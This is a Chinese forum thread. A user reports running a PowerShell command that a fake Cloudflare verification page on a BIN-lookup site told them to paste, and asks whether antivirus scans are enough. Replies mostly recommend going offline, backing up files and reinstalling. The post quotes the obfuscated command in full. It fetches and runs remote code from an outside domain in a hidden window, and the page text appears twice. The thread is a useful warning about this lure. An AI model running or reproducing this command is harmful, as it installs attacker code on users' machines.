【求助】遇到伪 cf 手动运行电脑病毒了
- 内容介绍
- 文章标签
- 相关推荐
今晚在访问 https://bincheck.io/zh 时,遇到一个和平时不太一样的 cf 盾
image822×726 22 KB
(此图来自站内其他佬友)
第一次见,脑子懵了,就真按照它上面的步骤来“过盾”了
运行的命令为
powershell.exe -wINDo mIniM $CYOVUTUg=IRm UNderPerfORmiZE.COM;$kkY=(64,$ep,$gS,4);$Wy=0;$kKY.FOreACH({$wY+=$_});.((GET-aLias)[$wy]).NAME $cYOvuTUG$JlxhFLkWkVLSizPimOHerPczJYgHOunQKpIsAXORneNVhLJpceHxWDspLZdSGaESlTCiKhwhTa
直到打开 ps 两三秒后,才感觉不对劲,赶紧把 ps 给关了!
然后才从 GPT 那知道这个命令有问题
image993×689 40.9 KB
同时也发现站内也有其他佬友踩坑
紧急求助,电脑疑似运行了病毒程序!下一步该怎么做? 开发调优今天中午我在查询卡bin的时候用了bincheck.io/zh这个网站,这个网站是我之前一直在用的,所以就放下了戒心。进入网站先出现了主页面。 [image] 然后跳转了 [image] 当时我以为是我ip纯净度问题,因为这个ip之前经常跳cf盾,所以我运行了。 但是我刚刚在用电脑的时候powershell突然闪了一下,我才后知后觉cf好像从来没有这种人机验证方式,并且这个“保密”和“…定向投毒:bincheck.io 伪装验证码诱导执行 PowerShell 远程加载 开发调优
近期在访问 BIN 查询站点 https://bincheck.io/zh 时,页面出现异常“Cloudflare 验证”,并提示执行以下操作: Win + R Ctrl + V Enter 该流程并非正常验证码行为,而是诱导用户在本机执行 PowerShell 命令。 命令分析结果: 使用大小写混淆 通过 FunctionName + Substring 拼接真实命令 实际执行逻辑为…
现在在用 360 系统急救箱和卡巴斯基一起补救
image-20260405002028789850×562 98.4 KB
image1255×986 64.7 KB
因为电脑里文件很多,如果要重装系统,备份文件有些儿麻烦。想问问各位佬友,是不是这两个杀毒软件检查没问题就可以了
网友解答:--【壹】--:
跟病毒行为有关吧,这我还真不好说
--【贰】--: xiaofang:
是不是这两个杀毒软件检查没问题就可以了
还是建议断网备份文件,然后重装系统
基本上这就是唯一解
360之类有时可能查不干净
--【叁】--:
长教训了
--【肆】--:
让我打开powershell我就觉得很不对劲了
--【伍】--:
长教训了
--【陆】--:
建议重装
--【柒】--:
具体做了什么 还需要把样本拿过来分析才知道喵
--【捌】--:
好的。佬,再请教一下,我是通过 windows 自带的远程桌面连接控制远程电脑执行这个操作的,请问这个病毒会不会影响我本地的电脑啊?
--【玖】--:
泥是笨蛋喵
cf怎么可能让你去执行命令
--【拾】--:
还是做好备份重新装下系统好一点
--【拾壹】--:
image1010×409 20.5 KB
佬,请问样本是指这里下载的内容吗?然后找个网站去解析一下吗?
--【拾贰】--:
没事没事 我也中招过
--【拾叁】--:
我也遇到了,我感觉不对,没有执行,关闭网页。
--【拾肆】--:
老老实实断网备份文件吧,过查杀还是有办法的
--【拾伍】--:
我还以为是一种新的验证方式,运行后也确实进入网站了,没多想。后面才越想越不对劲
--【拾陆】--:
佬后面也是重装系统吗
--【拾柒】--:
好的,谢谢佬,看来是一个不眠之夜了
--【拾捌】--:
好的,谢谢佬!
--【拾玖】--: xiaofang:
第一次见,脑子懵了,就真按照它上面的步骤来“过盾”了
?
今晚在访问 https://bincheck.io/zh 时,遇到一个和平时不太一样的 cf 盾
image822×726 22 KB
(此图来自站内其他佬友)
第一次见,脑子懵了,就真按照它上面的步骤来“过盾”了
运行的命令为
powershell.exe -wINDo mIniM $CYOVUTUg=IRm UNderPerfORmiZE.COM;$kkY=(64,$ep,$gS,4);$Wy=0;$kKY.FOreACH({$wY+=$_});.((GET-aLias)[$wy]).NAME $cYOvuTUG$JlxhFLkWkVLSizPimOHerPczJYgHOunQKpIsAXORneNVhLJpceHxWDspLZdSGaESlTCiKhwhTa
直到打开 ps 两三秒后,才感觉不对劲,赶紧把 ps 给关了!
然后才从 GPT 那知道这个命令有问题
image993×689 40.9 KB
同时也发现站内也有其他佬友踩坑
紧急求助,电脑疑似运行了病毒程序!下一步该怎么做? 开发调优今天中午我在查询卡bin的时候用了bincheck.io/zh这个网站,这个网站是我之前一直在用的,所以就放下了戒心。进入网站先出现了主页面。 [image] 然后跳转了 [image] 当时我以为是我ip纯净度问题,因为这个ip之前经常跳cf盾,所以我运行了。 但是我刚刚在用电脑的时候powershell突然闪了一下,我才后知后觉cf好像从来没有这种人机验证方式,并且这个“保密”和“…定向投毒:bincheck.io 伪装验证码诱导执行 PowerShell 远程加载 开发调优
近期在访问 BIN 查询站点 https://bincheck.io/zh 时,页面出现异常“Cloudflare 验证”,并提示执行以下操作: Win + R Ctrl + V Enter 该流程并非正常验证码行为,而是诱导用户在本机执行 PowerShell 命令。 命令分析结果: 使用大小写混淆 通过 FunctionName + Substring 拼接真实命令 实际执行逻辑为…
现在在用 360 系统急救箱和卡巴斯基一起补救
image-20260405002028789850×562 98.4 KB
image1255×986 64.7 KB
因为电脑里文件很多,如果要重装系统,备份文件有些儿麻烦。想问问各位佬友,是不是这两个杀毒软件检查没问题就可以了
网友解答:--【壹】--:
跟病毒行为有关吧,这我还真不好说
--【贰】--: xiaofang:
是不是这两个杀毒软件检查没问题就可以了
还是建议断网备份文件,然后重装系统
基本上这就是唯一解
360之类有时可能查不干净
--【叁】--:
长教训了
--【肆】--:
让我打开powershell我就觉得很不对劲了
--【伍】--:
长教训了
--【陆】--:
建议重装
--【柒】--:
具体做了什么 还需要把样本拿过来分析才知道喵
--【捌】--:
好的。佬,再请教一下,我是通过 windows 自带的远程桌面连接控制远程电脑执行这个操作的,请问这个病毒会不会影响我本地的电脑啊?
--【玖】--:
泥是笨蛋喵
cf怎么可能让你去执行命令
--【拾】--:
还是做好备份重新装下系统好一点
--【拾壹】--:
image1010×409 20.5 KB
佬,请问样本是指这里下载的内容吗?然后找个网站去解析一下吗?
--【拾贰】--:
没事没事 我也中招过
--【拾叁】--:
我也遇到了,我感觉不对,没有执行,关闭网页。
--【拾肆】--:
老老实实断网备份文件吧,过查杀还是有办法的
--【拾伍】--:
我还以为是一种新的验证方式,运行后也确实进入网站了,没多想。后面才越想越不对劲
--【拾陆】--:
佬后面也是重装系统吗
--【拾柒】--:
好的,谢谢佬,看来是一个不眠之夜了
--【拾捌】--:
好的,谢谢佬!
--【拾玖】--: xiaofang:
第一次见,脑子懵了,就真按照它上面的步骤来“过盾”了
?